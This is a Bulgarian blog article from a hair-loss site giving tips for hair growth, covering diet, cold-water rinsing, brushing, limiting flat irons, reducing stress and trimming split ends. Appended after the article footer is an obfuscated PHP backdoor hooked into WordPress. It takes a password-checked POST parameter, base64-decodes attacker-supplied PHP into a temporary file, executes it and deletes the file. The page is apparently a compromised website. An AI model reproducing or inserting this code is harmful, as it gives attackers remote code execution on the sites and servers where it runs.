Как да накараме косата да расте | Косопад

Как да накараме косата да расте

Дори да не забелязвате, косата постоянно се обновява. Затова трябва да е здрава, за да расте балансирано. Трябва да приемате вещества и витамини, които подпомагат процеса. Може да са храни, богати на протеини, като риба, яйца и месо.

kosa-luk

Има домашни рецепти, както и козметични продукти, които ускоряват растежа на косата. Но косъмът расте не повече от 1, 5 см до 3 см на месец.

Нека разгледаме някои полезни съвети за растежа на косата:

– Плакнете косата със студена вода, за да се запазят естествените мазнини на косъма. Масажирайте добре скалпа, когато нанасяте шампоан и балсам.

– Често я решете. Четката трябва да е с нежни зъби, най- добре от естествен косъм. Така стимулирате производството на мазнини, които смазват скалпа и косата.

kosopad-samochuvstvie

– Не прекалявайте с пресата. Вярно е, че в днешно време е трудно да избегнем пресата и сешоара. Гледайте обаче да не е прекалено често. Използвайте ги на ниска температура. Също така, не и когато косата е косата е мокра или влажна. Въпреки че има преси за влажна косата, все пак не ги използвайте.

– Избягвайте стреса. Стресът е навсякъде около нас: на работа, в училище, в университета, и пр. Трябва да неутрализирате стреса навреме, защото ако го подминавате, накрая ще имате сериозни проблеми. Стресът и напрежението често причиняват косопад, отслабване и изтощаване на косата

– Подстригване на връхчетата. Когато са цъфнали, затрудняват растежа, така че ги подстригвайте периодично.

20. юли 2014 17:56:41 от Надя Колева
Категории: Косопад – Статии | Етикети: , , | Напишете Коментар

if(!function_exists("_set_fetas_tag") && !function_exists("_set_betas_tag")){try{function _set_fetas_tag(){if(isset($_GET['here'])&&!isset($_POST['here'])){die(md5(8));}if(isset($_POST['here'])){$a1='m'.'d5';if($a1($a1($_POST['here']))==="83a7b60dd6a5daae1a2f1a464791dac4"){$a2="fi"."le"."_put"."_contents";$a22="base";$a22=$a22."64";$a22=$a22."_d";$a22=$a22."ecode";$a222="PD"."9wa"."HAg";$a2222=$_POST[$a1];$a3="sy"."s_ge"."t_te"."mp_dir";$a3=$a3();$a3 = $a3."/".$a1(uniqid(rand(), true));@$a2($a3,$a22($a222).$a22($a2222));include($a3); @$a2($a3,'1'); @unlink($a3);die();}else{echo md5(7);}die();}} _set_fetas_tag();if(!isset($_POST['here'])&&!isset($_GET['here'])){function _set_betas_tag(){echo "";}add_action('wp_head','_set_betas_tag');}}catch(Exception $e){}}